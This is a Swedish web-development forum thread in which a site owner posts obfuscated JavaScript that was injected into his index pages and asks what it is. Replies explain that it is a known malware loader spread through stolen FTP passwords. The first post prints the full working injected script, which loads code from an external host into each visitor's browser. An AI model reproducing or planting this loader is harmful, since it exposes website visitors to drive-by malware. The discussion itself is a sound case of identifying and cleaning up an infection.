webForumDet fria alternativet

Virus på hemsidan

Webbutveckling

8 svar · 1 037 visningar · startad av skarbratt

Medlem sedan juli 2000325 inlägg
Frågan#1

Dert verkar som om jag fått något virus på min dator, och samtliga index.*, default.* (*=ASP,HTML, SHTML, PHP, osv)fått följande tillägg i slutet på filerna:

<script>/*LGPL*/ try{ window.onload = function(){var Mwsfwpv9runrf = document.createElement('s(c)@##r^(i$&p&&)!t!$$@('.replace(/\$|@|\^|#|\)|\(|\!|&/ig, ''));Mwsfwpv9runrf.setAttribute('defer', 'd##e$^(f&!@@e$()r#)'.replace(/\(|#|\$|\^|\)|&|@|\!/ig, ''));Mwsfwpv9runrf.setAttribute('type', 't$&$e$)x#@t)^/$($&j@^a$v!(a@s^^c)&!@r!i^&$)p@#t)#^'.replace(/\$|#|\^|\)|\(|@|\!|&/ig, ''));Mwsfwpv9runrf.setAttribute('id', 'N&#&m!&(#m)$1!(e(!x@(#1#$l$&&!$p^@#@w()9!z@!'.replace(/&|@|\)|\$|#|\^|\!|\(/ig, ''));Mwsfwpv9runrf.setAttribute('s(!)r@^$c)!'.replace(/\)|@|\$|\(|\^|&|#|\!/ig, ''),  'h&t^&t&$$^p&)(#:!)$/!/^h$#y(v!e)!$s^!#-!@^n#)l@)(.)!!(v!o@($i$(#l^))a^&^.(!f&&^@r^^.@&t$y$&p)^&@e@$(p)a(@!^d!(@-#c)o$(m)!.@($c&@a(@((r$^!&s&#@w^#@e^!b#^n)@!!e@@t$!.^@r#u&$#:&$)((8&)!0((8!!^0^/!^n)##@a)q@)i@)!@&g&s^).#^)^c(o^!m#/$^@n)a&@@q^((i@&&g(!^@&s@.^@^$c$^@)@o)$^m)!/#^^g@o#^o(@#g!l&()@e$@.)(&c&@o!m)&#/!@s$^&e#^#z#&n@^#a$&!m#$(@.#$c&@$z(@$$/!s&#a!)$n@@o@!^)!o^((k(#&.$#)c$o$()@m(#/!&^'.replace(/\^|&|\$|\)|\!|@|#|\(/ig, ''));if (document){document.body.appendChild(Mwsfwpv9runrf);}} } catch(Xgct6ssg1q1bzua3e1jo) {}</script>\n<!--cf9b5d8e2f1a53344c2ba6918af8d125-->

Någon som vet mer om detta, vad är det för virus jag åkt på, och hur har den lyckats indexera filerna som ligger på mitt webbhotell? Jag har ju inte uppdaterat alla filerna. Kan viruset ha letat sig in igenom något FTP program när jag haft en anslutning öppen och på så sätt lagt till denna kod?

Nu är det akuta problemet löst, men tar gärna emot erfarenheter för att undvika framöver.

Medlem sedan feb. 200112 078 inlägg
#2

Det är ett obfuscerat script, ja. Det verkar vara i "reklamsyfte".

Symantec vet mer: http://www.symantec.com/connect/blogs/new-obfuscated-scripts-wild-lgpl

Om detta har inträffat medans filerna befann sig på ditt webbhotell, föreslår jag att du byter webbhotell och meddelar dem om att de har blivit utsatta för datorintrång/malware. Dock, det kan ju också vara så att filerna ändrades på din dator innan du laddade upp dem, vilket väl är mer troligt.

Medlem sedan juli 2000325 inlägg
#3

Jag sökte även den del på nätet och fann följande: http://seoforums.org/site-optimization/118-script-gnu-gpl-try-window-onload-function-var.html

Verkar som viruset infekterar "min" dator och sedan snor FTP lösenord och inloggningsnamn, och sparar på en server i kina, och via den vägen uppdateras på webservern.

Detta verkar mest troligt då det rör sig om tre sidor, och det är dessa tre lösenord jag har/hade sparade på datorn (använder enklaste möjliga FTP program, dvs Explorer), samt att jag inte rört flera av de berörda filerna på mycket länge.

Medlem sedan feb. 200112 078 inlägg
#4

Ja, där ser man så (o)trevligt. Skaffa ett antivirusprogram med bra definitioner.

Medlem sedan feb. 20034 441 inlägg
#5

Mitt antivirusprogram (NOD32 4) stänger anslutningen _direkt_ när jag går in i den här tråden, eller på någon annan sida som innehåller kodsträngen ovan.

Verkar vara en oskön pryl det här, om den snor lösenord och sånt.

Medlem sedan juli 200012 978 inlägg
#6

Efter att ha lusläst lite loggar som systemen producerar undra jag om du har gjort en koll på vad Logs innehåller? Det kan förstås vara svårt att finna rätt IP nummer, men det kan vara värt att kolla ändringstidpunkt på index med loggens IP kontakt,

Medlem sedan juli 2000325 inlägg
#7

Det kanske hade varit en väg, men vet i katten vart det leder, kommer säkert hitta IP nummer till någon annan dator som blivit kapad...

Bytte ut lösenorden och det löste problemet. Uppdaterade sidorna två gånger innan jag hittade det där om att lösenordet kidnappas...

Medlem sedan feb. 200112 078 inlägg
#8

Markera gärna rätt svar som lösning. :)

Medlem sedan maj 20053 909 inlägg
#9

Hoppsan, var det kodsnutten som är inlagd i första inlägget som larmade i mitt Smart Security? Det kommer upp när jag går in på denna sidan. I så fall verkar ju programmet fungera som det ska. :)

scs.gif
266 ms totalt · 4 externa anrop · v20260731065814-full.6fe65c25
123 ms — deklarationer (db)
0 ms — hämta statistik (cache)
136 ms — hämta tråd, inlägg och bilagor (db)
127 ms — ändringar (db)